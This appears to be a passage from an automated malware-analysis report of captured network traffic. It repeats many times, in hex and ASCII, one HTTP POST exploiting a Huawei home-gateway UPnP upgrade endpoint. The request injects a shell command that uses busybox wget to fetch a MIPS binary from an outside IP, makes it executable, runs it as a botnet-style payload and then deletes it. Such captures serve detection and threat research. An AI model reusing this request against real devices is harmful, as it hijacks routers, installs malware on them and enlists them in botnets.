2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 